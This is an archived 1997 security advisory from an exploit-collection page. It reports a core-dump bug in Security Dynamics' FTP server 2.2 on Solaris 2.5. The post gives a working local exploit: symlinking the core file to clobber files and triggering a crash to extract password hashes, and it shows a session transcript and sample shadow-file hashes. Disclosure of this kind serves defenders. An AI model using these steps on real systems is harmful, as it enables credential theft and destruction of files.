Security Dynamics FTP server core problem

Summary

Description:	It is possible to cause this server to dump core while ftping in. The core file will clobber files and also contains crypt(3)ed passwords.
Author:	sp00n <sp00n@COUPLER.300BAUD.COM>
Compromise:	root (local)
Vulnerable Systems:	Solaris 2.5 running Security Dynamics' FTP server (Version 2.2) perhaps other versions.
Date:	12 November 1997

Details

Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: best-of-security@cyber.com.au
Subject: BoS:      Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(

Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root

[ Junk cut --Fyodor ]

More
Exploits!

The master index of all exploits is available
here (Very large file)

Or you can pick your favorite operating system:

All OS's
Linux
Solaris/SunOS
Micro$oft

*BSD
Macintosh
AIX
IRIX

ULTRIX/Digital UNIX
HP/UX
SCO
Remote exploits

This page is part of  Fyodor's exploit
world.  
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap.  Or try these Insecure.Org resources:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits